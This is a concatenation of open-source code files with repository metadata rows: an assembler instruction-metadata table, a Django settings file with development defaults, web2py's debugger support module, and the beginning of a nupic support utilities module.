form057 = insn_metadata(([0], [1], [0, 1], False, False, [], [], [], False, False))
form058 = insn_metadata(([], [], [], False, True, [31], [], [], True, False))
form059 = insn_metadata(([], [], [], False, True, [], [15], [0], True, False))
form060 = insn_metadata(([0, 1], [], [], False, True, [], [15], [], True, False))
form061 = insn_metadata(([0], [], [], False, True, [], [15], [], True, False))
form062 = insn_metadata(([0], [], [], False, True, [], [15], [1], True, False))
form063 = insn_metadata(([1], [], [], False, True, [], [15], [0], True, False))
form064 = insn_metadata(([0, 1], [], [], False, True, [], [], [], True, False))
form065 = insn_metadata(([0], [], [], False, True, [], [], [], True, False))
form066 = insn_metadata(([0], [], [], False, True, [], [], [1], True, False))
form067 = insn_metadata(([1], [], [], False, True, [], [], [0], True, False))
form068 = insn_metadata(([0, 1], [], [1], True, False, [], [], [], False, False))
form069 = insn_metadata(([0, 1], [], [0], False, False, [], [], [2], False, False))
form070 = insn_metadata(([0, 2], [], [0], False, False, [], [], [1], False, False))
form071 = insn_metadata(([0], [], [0], False, False, [], [], [1], False, False))
form072 = insn_metadata(([0], [], [], False, False, [], [], [], True, False))
insninfo = {
'add' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'addcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'addx' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'addxcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'allocate' : [
(re018, form028),
(re017, form005),
(re020, form026),
],
'allocates' : [
(re018, form028),
(re017, form005),
(re020, form026),
],
'allocatex' : [
(re018, form028),
(re017, form005),
(re020, form026),
],
'and' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'andcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'andn' : [
(re001, form001),
(re003, form003),
],
'andncc' : [
(re001, form001),
(re003, form003),
],
'b' : [
(re000, form052),
],
'b,a' : [
(re000, form052),
],
'ba' : [
(re000, form000),
],
'ba,a' : [
(re000, form000),
],
'bcc' : [
(re000, form000),
],
'bcc,a' : [
(re000, form000),
],
'bclr' : [
(re017, form022),
(re020, form023),
],
'bcs' : [
(re000, form000),
],
'bcs,a' : [
(re000, form000),
],
'be' : [
(re000, form000),
],
'be,a' : [
(re000, form000),
],
'beq' : [
(re000, form000),
],
'beq,a' : [
(re000, form000),
],
'bg' : [
(re000, form000),
],
'bg,a' : [
(re000, form000),
],
'bge' : [
(re000, form000),
],
'bge,a' : [
(re000, form000),
],
'bgeu' : [
(re000, form000),
],
'bgeu,a' : [
(re000, form000),
],
'bgt' : [
(re000, form000),
],
'bgt,a' : [
(re000, form000),
],
'bgu' : [
(re000, form000),
],
'bgu,a' : [
(re000, form000),
],
'bl' : [
(re000, form000),
],
'bl,a' : [
(re000, form000),
],
'ble' : [
(re000, form000),
],
'ble,a' : [
(re000, form000),
],
'bleu' : [
(re000, form000),
],
'bleu,a' : [
(re000, form000),
],
'blt' : [
(re000, form000),
],
'blt,a' : [
(re000, form000),
],
'blu' : [
(re000, form000),
],
'blu,a' : [
(re000, form000),
],
'bn' : [
(re000, form000),
],
'bn,a' : [
(re000, form000),
],
'bne' : [
(re000, form000),
],
'bne,a' : [
(re000, form000),
],
'bneg' : [
(re000, form000),
],
'bneg,a' : [
(re000, form000),
],
'bnz' : [
(re000, form000),
],
'bnz,a' : [
(re000, form000),
],
'bpos' : [
(re000, form000),
],
'bpos,a' : [
(re000, form000),
],
'break' : [
(re018, form027),
(re000, form032),
],
'bset' : [
(re017, form022),
(re020, form023),
],
'btog' : [
(re017, form022),
(re020, form023),
],
'btst' : [
(re017, form030),
(re020, form040),
],
'bvc' : [
(re000, form000),
],
'bvc,a' : [
(re000, form000),
],
'bvs' : [
(re000, form000),
],
'bvs,a' : [
(re000, form000),
],
'bz' : [
(re000, form000),
],
'bz,a' : [
(re000, form000),
],
'call' : [
(re000, form059),
(re091, form059),
(re087, form060),
(re092, form060),
(re018, form061),
(re093, form061),
(re088, form062),
(re094, form062),
(re089, form063),
(re095, form063),
(re000, form059),
(re091, form059),
(re018, form061),
(re093, form061),
],
'clr' : [
(re018, form018),
(re018, form018),
(re077, form030),
(re078, form027),
(re079, form031),
(re080, form040),
(re081, form032),
(re078, form027),
],
'clrb' : [
(re077, form030),
(re078, form027),
(re079, form031),
(re080, form040),
(re081, form032),
(re078, form027),
],
'clrh' : [
(re077, form030),
(re078, form027),
(re079, form031),
(re080, form040),
(re081, form032),
(re078, form027),
],
'cmp' : [
(re017, form030),
(re031, form031),
],
'cpop1' : [
(re007, form001),
],
'cpop2' : [
(re007, form001),
],
'create' : [
(re017, form005),
],
'cred' : [
(re020, form015),
],
'crei' : [
(re017, form012),
],
'dec' : [
(re018, form041),
(re020, form023),
],
'deccc' : [
(re018, form041),
(re020, form023),
],
'detach' : [
(re018, form027),
],
'f_alloc' : [
(re018, form018),
],
'f_break' : [
(re002, form002),
(re018, form027),
],
'f_create' : [
(re017, form012),
(re001, form004),
(re031, form014),
(re003, form024),
],
'f_fence' : [
(re017, form030),
(re001, form001),
(re031, form031),
(re003, form003),
(re018, form027),
(re000, form032),
],
'f_freesrb' : [
(re018, form027),
],
'f_get_blockindex' : [
(re017, form017),
(re018, form018),
],
'f_get_blocksize' : [
(re017, form017),
(re018, form018),
],
'f_get_gridsize' : [
(re017, form017),
(re018, form018),
],
'f_mapg' : [
(re001, form001),
(re003, form003),
(re017, form030),
(re031, form031),
],
'f_maphtg' : [
(re001, form001),
(re003, form003),
(re017, form030),
(re031, form031),
],
'f_set_blocksize' : [
(re017, form030),
(re031, form031),
],
'f_set_gridsize' : [
(re017, form030),
(re031, form031),
],
'fabss' : [
(re017, form017),
],
'faddd' : [
(re001, form029),
],
'faddq' : [
(re001, form019),
],
'fadds' : [
(re001, form004),
],
'faddx' : [
(re001, form019),
],
'fb' : [
(re000, form000),
],
'fb,a' : [
(re000, form000),
],
'fba' : [
(re000, form000),
],
'fba,a' : [
(re000, form000),
],
'fbe' : [
(re000, form000),
],
'fbe,a' : [
(re000, form000),
],
'fbg' : [
(re000, form000),
],
'fbg,a' : [
(re000, form000),
],
'fbge' : [
(re000, form000),
],
'fbge,a' : [
(re000, form000),
],
'fbl' : [
(re000, form000),
],
'fbl,a' : [
(re000, form000),
],
'fble' : [
(re000, form000),
],
'fble,a' : [
(re000, form000),
],
'fblg' : [
(re000, form000),
],
'fblg,a' : [
(re000, form000),
],
'fbn' : [
(re000, form000),
],
'fbn,a' : [
(re000, form000),
],
'fbne' : [
(re000, form000),
],
'fbne,a' : [
(re000, form000),
],
'fbnz' : [
(re000, form000),
],
'fbnz,a' : [
(re000, form000),
],
'fbo' : [
(re000, form000),
],
'fbo,a' : [
(re000, form000),
],
'fbu' : [
(re000, form000),
],
'fbu,a' : [
(re000, form000),
],
'fbue' : [
(re000, form000),
],
'fbue,a' : [
(re000, form000),
],
'fbug' : [
(re000, form000),
],
'fbug,a' : [
(re000, form000),
],
'fbuge' : [
(re000, form000),
],
'fbuge,a' : [
(re000, form000),
],
'fbul' : [
(re000, form000),
],
'fbul,a' : [
(re000, form000),
],
'fbule' : [
(re000, form000),
],
'fbule,a' : [
(re000, form000),
],
'fbz' : [
(re000, form000),
],
'fbz,a' : [
(re000, form000),
],
'fcmpd' : [
(re017, form068),
],
'fcmped' : [
(re017, form068),
],
'fcmpeq' : [
(re017, form042),
],
'fcmpes' : [
(re017, form012),
],
'fcmpex' : [
(re017, form042),
],
'fcmpq' : [
(re017, form042),
],
'fcmps' : [
(re017, form012),
],
'fcmpx' : [
(re017, form042),
],
'fdivd' : [
(re001, form029),
],
'fdivq' : [
(re001, form019),
],
'fdivs' : [
(re001, form004),
],
'fdivx' : [
(re001, form019),
],
'fdmulq' : [
(re001, form029),
],
'fdmulx' : [
(re001, form029),
],
'fdtoi' : [
(re017, form054),
],
'fdtoq' : [
(re017, form057),
],
'fdtos' : [
(re017, form054),
],
'fgets' : [
(re003, form024),
],
'fitod' : [
(re017, form051),
],
'fitoq' : [
(re017, form051),
],
'fitos' : [
(re017, form017),
],
'flush' : [
(re087, form012),
(re018, form013),
(re018, form013),
(re000, form016),
(re088, form014),
(re089, form015),
],
'fmovs' : [
(re017, form017),
],
'fmuld' : [
(re001, form029),
],
'fmulq' : [
(re001, form019),
],
'fmuls' : [
(re001, form004),
],
'fmulx' : [
(re001, form019),
],
'fnegs' : [
(re017, form017),
],
'fprintd' : [
(re017, form030),
],
'fprintq' : [
(re017, form021),
],
'fprints' : [
(re017, form030),
],
'fputg' : [
(re090, form038),
],
'fputs' : [
(re090, form038),
],
'fqtod' : [
(re017, form057),
],
'fqtoi' : [
(re017, form054),
],
'fqtos' : [
(re017, form054),
],
'fsmuld' : [
(re001, form007),
],
'fsqrtd' : [
(re017, form033),
],
'fsqrtq' : [
(re017, form033),
],
'fsqrts' : [
(re017, form005),
],
'fsqrtx' : [
(re017, form033),
],
'fstod' : [
(re017, form051),
],
'fstoi' : [
(re017, form017),
],
'fstoq' : [
(re017, form051),
],
'fsubd' : [
(re001, form029),
],
'fsubq' : [
(re001, form019),
],
'fsubs' : [
(re001, form004),
],
'fsubx' : [
(re001, form019),
],
'getcid' : [
(re018, form018),
],
'getfid' : [
(re018, form018),
],
'getpid' : [
(re018, form018),
],
'gets' : [
(re003, form024),
],
'gettid' : [
(re018, form018),
],
'iflush' : [
(re087, form012),
(re018, form013),
(re018, form013),
(re000, form016),
(re088, form014),
(re089, form015),
],
'inc' : [
(re018, form041),
(re020, form023),
],
'inccc' : [
(re018, form041),
(re020, form023),
],
'jmp' : [
(re087, form064),
(re018, form065),
(re088, form066),
(re089, form067),
(re000, form052),
(re018, form065),
],
'jmpl' : [
(re084, form046),
(re017, form047),
(re017, form047),
(re020, form048),
(re085, form049),
(re086, form050),
],
'launch' : [
(re018, form072),
],
'ld' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
(re021, form012),
(re022, form013),
(re023, form014),
(re024, form015),
(re025, form016),
(re022, form013),
(re012, form012),
(re013, form013),
(re014, form014),
(re015, form015),
(re016, form016),
(re013, form013),
(re026, form012),
(re027, form013),
(re028, form014),
(re029, form015),
(re030, form016),
(re027, form013),
],
'lda' : [
(re004, form004),
(re005, form005),
],
'ldbp' : [
(re018, form018),
],
'ldd' : [
(re007, form007),
(re008, form008),
(re009, form009),
(re010, form010),
(re011, form011),
(re008, form008),
(re007, form007),
(re008, form008),
(re009, form009),
(re010, form010),
(re011, form011),
(re008, form008),
(re012, form012),
(re013, form013),
(re014, form014),
(re015, form015),
(re016, form016),
(re013, form013),
],
'ldda' : [
(re004, form004),
(re005, form005),
],
'ldfp' : [
(re018, form018),
],
'ldsb' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'ldsba' : [
(re004, form004),
(re005, form005),
],
'ldsh' : [
(re008, form005),
(re007, form004),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'ldsha' : [
(re004, form004),
(re005, form005),
],
'ldstub' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'ldstuba' : [
(re004, form004),
(re005, form005),
],
'ldub' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'lduba' : [
(re004, form004),
(re005, form005),
],
'lduh' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'lduha' : [
(re004, form004),
(re005, form005),
],
'mov' : [
(re032, form030),
(re033, form031),
(re034, form030),
(re035, form031),
(re036, form030),
(re037, form031),
(re038, form030),
(re039, form031),
(re040, form030),
(re041, form031),
(re042, form018),
(re043, form018),
(re044, form018),
(re045, form018),
(re046, form018),
(re047, form027),
(re048, form032),
(re047, form027),
(re049, form027),
(re050, form032),
(re049, form027),
(re051, form027),
(re052, form032),
(re051, form027),
(re053, form027),
(re054, form032),
(re053, form027),
(re055, form027),
(re056, form032),
(re055, form027),
(re017, form017),
(re020, form006),
(re017, form017),
(re017, form017),
],
'mulscc' : [
(re001, form043),
(re003, form044),
],
'neg' : [
(re017, form017),
(re018, form041),
],
'nop' : [
(re002, form002),
],
'not' : [
(re017, form017),
(re018, form041),
],
'or' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'orcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'orn' : [
(re001, form001),
(re003, form003),
],
'orncc' : [
(re001, form001),
(re003, form003),
],
'print' : [
(re017, form030),
(re031, form031),
],
'putg' : [
(re090, form038),
],
'puts' : [
(re090, form038),
],
'r_allocsrb' : [
(re017, form017),
(re020, form006),
],
'r_read' : [
(re017, form005),
],
'r_write' : [
(re017, form012),
(re001, form004),
(re031, form014),
(re003, form024),
],
'rd' : [
(re042, form018),
(re043, form018),
(re044, form018),
(re045, form018),
(re106, form006),
(re046, form018),
],
'release' : [
(re018, form027),
],
'restore' : [
(re001, form001),
(re002, form002),
(re003, form003),
(re002, form002),
],
'ret' : [
(re002, form055),
],
'retl' : [
(re002, form058),
],
'rett' : [
(re087, form064),
(re018, form065),
(re088, form066),
(re089, form067),
(re000, form052),
(re000, form052),
(re018, form065),
],
'save' : [
(re001, form001),
(re003, form003),
(re002, form002),
],
'sdiv' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'sdivcc' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'set' : [
(re006, form006),
],
'setblock' : [
(re017, form030),
(re031, form031),
],
'sethi' : [
(re020, form006),
],
'setlimit' : [
(re017, form030),
(re031, form031),
],
'setstart' : [
(re017, form030),
(re031, form031),
],
'setstep' : [
(re017, form030),
(re031, form031),
],
'setthread' : [
(re017, form030),
(re031, form031),
],
'sll' : [
(re001, form001),
(re003, form003),
],
'smul' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'smulcc' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'spill' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'spilld' : [
(re057, form053),
(re058, form021),
(re059, form069),
(re060, form070),
(re061, form071),
(re058, form021),
],
'sra' : [
(re001, form001),
(re003, form003),
],
'srl' : [
(re001, form001),
(re003, form003),
],
'st' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
(re062, form030),
(re063, form027),
(re064, form031),
(re065, form040),
(re066, form032),
(re063, form027),
(re067, form030),
(re068, form027),
(re069, form031),
(re070, form040),
(re071, form032),
(re068, form027),
(re072, form030),
(re073, form027),
(re074, form031),
(re075, form040),
(re076, form032),
(re073, form027),
],
'sta' : [
(re082, form037),
(re083, form030),
],
'stb' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stba' : [
(re082, form037),
(re083, form030),
],
'stbar' : [
(re002, form056),
],
'std' : [
(re057, form053),
(re058, form021),
(re059, form069),
(re060, form070),
(re061, form071),
(re058, form021),
(re096, form030),
(re097, form027),
(re098, form031),
(re099, form040),
(re100, form032),
(re097, form027),
(re057, form053),
(re058, form021),
(re059, form069),
(re060, form070),
(re061, form071),
(re058, form021),
(re101, form030),
(re102, form027),
(re103, form031),
(re104, form040),
(re105, form032),
(re102, form027),
(re062, form030),
(re063, form027),
(re064, form031),
(re065, form040),
(re066, form032),
(re063, form027),
],
'stda' : [
(re082, form053),
(re083, form021),
],
'sth' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stha' : [
(re082, form037),
(re083, form030),
],
'stsb' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stsba' : [
(re082, form037),
(re083, form030),
],
'stsh' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stsha' : [
(re082, form037),
(re083, form030),
],
'stub' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stuba' : [
(re082, form037),
(re083, form030),
],
'stuh' : [
(re057, form037),
(re058, form030),
(re059, form038),
(re060, form039),
(re061, form031),
(re058, form030),
],
'stuha' : [
(re082, form037),
(re083, form030),
],
'sub' : [
(re001, form001),
(re003, form003),
],
'subcc' : [
(re001, form001),
(re003, form003),
],
'subx' : [
(re001, form001),
(re003, form003),
],
'subxcc' : [
(re001, form001),
(re003, form003),
],
'swap' : [
(re007, form004),
(re008, form005),
(re009, form024),
(re010, form025),
(re011, form026),
(re008, form005),
],
'swapa' : [
(re004, form004),
(re005, form005),
],
'sync' : [
(re017, form005),
],
't_allochtg' : [
(re001, form001),
(re003, form003),
(re001, form004),
(re003, form024),
],
't_end' : [
(re002, form002),
],
't_freehtg' : [
(re018, form027),
],
't_get_fid' : [
(re018, form018),
],
't_get_pindex' : [
(re018, form018),
],
't_get_tid' : [
(re018, form018),
],
't_wait' : [
(re002, form002),
(re018, form027),
],
'taddcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'taddcctv' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'tst' : [
(re018, form027),
(re018, form027),
(re018, form027),
],
'tsubcc' : [
(re001, form001),
(re003, form003),
],
'tsubcctv' : [
(re001, form001),
(re003, form003),
],
'udiv' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'udivcc' : [
(re001, form043),
(re003, form044),
(re019, form045),
],
'umul' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'umulcc' : [
(re001, form034),
(re003, form035),
(re019, form036),
],
'unimp' : [
(re000, form032),
],
'wr' : [
(re032, form030),
(re033, form031),
(re047, form027),
(re034, form030),
(re035, form031),
(re049, form027),
(re036, form030),
(re037, form031),
(re051, form027),
(re038, form030),
(re039, form031),
(re053, form027),
(re040, form030),
(re041, form031),
(re055, form027),
],
'xnor' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'xnorcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'xor' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
'xorcc' : [
(re001, form001),
(re003, form003),
(re019, form020),
],
}
| gpl-3.0 | 3,683,968,049,073,578,000 | 25.209459 | 183 | 0.426605 | false |
LavaLabUSC/application-review | review/settings.py | 1 | 2875 | import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'k2m-60hm+%6w%0jalqd5-m2%fe0zc2or!&-)c502bd34q-i047'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'webview',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
# 'review.middleware.LoginRequiredMiddleware',
]
ROOT_URLCONF = 'review.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'review.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
LOGIN_URL = '/admin/'
| mit | 4,462,475,505,393,296,000 | 24.669643 | 91 | 0.678609 | false |
xiang12835/python_web | py2_web2py/web2py/gluon/debug.py | 1 | 5583 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Developed by Massimo Di Pierro <[email protected]>,
| limodou <[email protected]> and srackham <[email protected]>.
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Debugger support classes
------------------------
"""
import logging
import pdb
import sys
from gluon._compat import Queue
logger = logging.getLogger("web2py")
class Pipe(Queue.Queue):
def __init__(self, name, mode='r', *args, **kwargs):
self.__name = name
Queue.Queue.__init__(self, *args, **kwargs)
def write(self, data):
logger.debug("debug %s writing %s" % (self.__name, data))
self.put(data)
def flush(self):
# mark checkpoint (complete message)
logger.debug("debug %s flushing..." % self.__name)
self.put(None)
# wait until it is processed
self.join()
logger.debug("debug %s flush done" % self.__name)
def read(self, count=None, timeout=None):
logger.debug("debug %s reading..." % (self.__name, ))
data = self.get(block=True, timeout=timeout)
# signal that we are ready
self.task_done()
logger.debug("debug %s read %s" % (self.__name, data))
return data
def readline(self):
logger.debug("debug %s readline..." % (self.__name, ))
return self.read()
pipe_in = Pipe('in')
pipe_out = Pipe('out')
debugger = pdb.Pdb(completekey=None, stdin=pipe_in, stdout=pipe_out,)
def set_trace():
"""breakpoint shortcut (like pdb)"""
logger.info("DEBUG: set_trace!")
debugger.set_trace(sys._getframe().f_back)
def stop_trace():
"""stop waiting for the debugger (called atexit)"""
# this should prevent communicate is wait forever a command result
# and the main thread has finished
logger.info("DEBUG: stop_trace!")
pipe_out.write("debug finished!")
pipe_out.write(None)
#pipe_out.flush()
def communicate(command=None):
"""send command to debbuger, wait result"""
if command is not None:
logger.info("DEBUG: sending command %s" % command)
pipe_in.write(command)
#pipe_in.flush()
result = []
while True:
data = pipe_out.read()
if data is None:
break
result.append(data)
logger.info("DEBUG: result %s" % repr(result))
return ''.join(result)
# New debugger implementation using dbg and a web UI
import gluon.contrib.dbg as c_dbg
from threading import RLock
interact_lock = RLock()
run_lock = RLock()
def check_interaction(fn):
"""Decorator to clean and prevent interaction when not available"""
def check_fn(self, *args, **kwargs):
interact_lock.acquire()
try:
if self.filename:
self.clear_interaction()
return fn(self, *args, **kwargs)
finally:
interact_lock.release()
return check_fn
class WebDebugger(c_dbg.Frontend):
"""Qdb web2py interface"""
def __init__(self, pipe, completekey='tab', stdin=None, stdout=None):
c_dbg.Frontend.__init__(self, pipe)
self.clear_interaction()
def clear_interaction(self):
self.filename = None
self.lineno = None
self.exception_info = None
self.context = None
# redefine Frontend methods:
def run(self):
run_lock.acquire()
try:
while self.pipe.poll():
c_dbg.Frontend.run(self)
finally:
run_lock.release()
def interaction(self, filename, lineno, line, **context):
# store current status
interact_lock.acquire()
try:
self.filename = filename
self.lineno = lineno
self.context = context
finally:
interact_lock.release()
def exception(self, title, extype, exvalue, trace, request):
self.exception_info = {'title': title,
'extype': extype, 'exvalue': exvalue,
'trace': trace, 'request': request}
@check_interaction
def do_continue(self):
c_dbg.Frontend.do_continue(self)
@check_interaction
def do_step(self):
c_dbg.Frontend.do_step(self)
@check_interaction
def do_return(self):
c_dbg.Frontend.do_return(self)
@check_interaction
def do_next(self):
c_dbg.Frontend.do_next(self)
@check_interaction
def do_quit(self):
c_dbg.Frontend.do_quit(self)
def do_exec(self, statement):
interact_lock.acquire()
try:
# check to see if we're inside interaction
if self.filename:
# avoid spurious interaction notifications:
self.set_burst(2)
# execute the statement in the remote debugger:
return c_dbg.Frontend.do_exec(self, statement)
finally:
interact_lock.release()
# create the connection between threads:
parent_queue, child_queue = Queue.Queue(), Queue.Queue()
front_conn = c_dbg.QueuePipe("parent", parent_queue, child_queue)
child_conn = c_dbg.QueuePipe("child", child_queue, parent_queue)
web_debugger = WebDebugger(front_conn) # frontend
dbg_debugger = c_dbg.Qdb(pipe=child_conn, redirect_stdio=False, skip=None) # backend
dbg = dbg_debugger
# enable getting context (stack, globals/locals) at interaction
dbg_debugger.set_params(dict(call_stack=True, environment=True))
import gluon.main
gluon.main.global_settings.debugging = True
| apache-2.0 | -3,998,305,188,738,329,600 | 27.484694 | 86 | 0.605409 | false |
tomsilver/nupic | nupic/support/__init__.py | 1 | 25825 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
## @file
Internal package.
Package containing modules that are used internally by Numenta Python
tools and plugins to extend standard library functionality.
These modules should NOT be used by client applications.
The following modules are included:
nupic.support.paths
Module containing filesystem path manipulation utilities.
nupic.support.serialization
Module containing Python object serialization (pickling and unpickling) and
versioning utilities.
nupic.support.compress
Module containing Python object encoding and compression utilities.
nupic.support.processes
Module containing operating system process management utilities and wrappers.
nupic.support.output
Module containing operating system interprocess communication utilities and
wrappers.
nupic.support.diff
Module containing file difference calculation wrappers.
nupic.support.vision
Temporary location for vision framework before the move to nupic.vision.
nupic.support.deprecate
Contains the deprecate decorator used for automatic handling of deprecated
methods.
nupic.support.memchecker
Contains the MemChecker class, for checking physical memory and monitoring
memory usage.
nupic.support.imagesearch
Contains functions for searching for images on the web and downloading them.
"""
from __future__ import with_statement
# Standard imports
import os
import sys
import inspect
import logging
import logging.config
import logging.handlers
from platform import python_version
import struct
from StringIO import StringIO
import time
import traceback
from pkg_resources import resource_string, resource_filename
from configuration import Configuration
from nupic.support.fshelpers import makeDirectoryFromAbsolutePath
# Local imports
#############################################################################
def getCallerInfo(depth=2):
"""Utility function to get information about function callers
The information is the tuple (function/method name, filename, class)
The class will be None if the caller is just a function and not an object
method.
depth: how far back in the callstack to go to extract the caller info
"""
f = sys._getframe(depth)
method_name = f.f_code.co_name
filename = f.f_code.co_filename
arg_class = None
args = inspect.getargvalues(f)
if len(args[0]) > 0:
arg_name = args[0][0] # potentially the 'self' arg if its a method
arg_class = args[3][arg_name].__class__.__name__
return (method_name, filename, arg_class)
#############################################################################
def title(s=None, additional='', stream=sys.stdout, frame='-'):
"""Utility function to display nice titles
It automatically extracts the name of the function/method it is called from
and you can add additional text. title() will then print the name
of the function/method and the additional text surrounded by tow lines
of dashes. If you don't want the name of the function, you can provide
alternative text (regardless of the additional text)
@param s - text to display, uses the function name and arguments by default
@param additional - extra text to display (not needed if s is not None)
@param stream - the stream to print to. Ny default goes to standard output
@param frame - the character used for the over and under line. Default is '-'
Examples:
def foo():
title()
will display:
---
foo
---
def foo():
title(additional='(), this is cool!!!')
will display:
----------------------
foo(), this is cool!!!
----------------------
def foo():
title('No function name here!')
will display:
----------------------
No function name here!
----------------------
"""
if s is None:
callable_name, file_name, class_name = getCallerInfo(2)
s = callable_name
if class_name is not None:
method_name = s
s = class_name + '.' + callable_name
lines = (s + additional).split('\n')
length = max(len(line) for line in lines)
print >> stream, '-' * length
print >> stream, s + additional
print >> stream, '-' * length
#############################################################################
def bringToFront(title):
"""Bring a top-level window with a given title
to the front on Windows"""
if sys.platform != 'win32':
return
import ctypes
find_window = ctypes.windll.user32.FindWindowA
set_foreground_window = ctypes.windll.user32.SetForegroundWindow
hwnd = find_window(None, title)
if hwnd == 0:
raise Exception('There is no window titled: "%s"' % title)
set_foreground_window(hwnd)
#############################################################################
def getUserDocumentsPath():
"""
Find the user's "Documents" directory (OS X), "My Documents" directory
(Windows), or home directory (Unix).
"""
# OS X and Windows code from:
# http://www.blueskyonmars.com/2005/08/05
# /finding-a-users-my-documents-folder-on-windows/
# Alternate Windows code from:
# http://bugs.python.org/issue1763
if sys.platform.startswith('win'):
if sys.platform.startswith('win32'):
# Try the primary method on 32-bit windows
try:
from win32com.shell import shell
alt = False
except ImportError:
try:
import ctypes
dll = ctypes.windll.shell32
alt = True
except:
raise Exception("Could not find 'My Documents'")
else:
# Use the alternate method on 64-bit Windows
alt = True
if not alt:
# Primary method using win32com
df = shell.SHGetDesktopFolder()
pidl = df.ParseDisplayName(0, None,
"::{450d8fba-ad25-11d0-98a8-0800361b1103}")[1]
path = shell.SHGetPathFromIDList(pidl)
else:
# Alternate method using ctypes rather than win32com
buf = ctypes.create_string_buffer(300)
dll.SHGetSpecialFolderPathA(None, buf, 0x0005, False)
path = buf.value
elif sys.platform.startswith('darwin'):
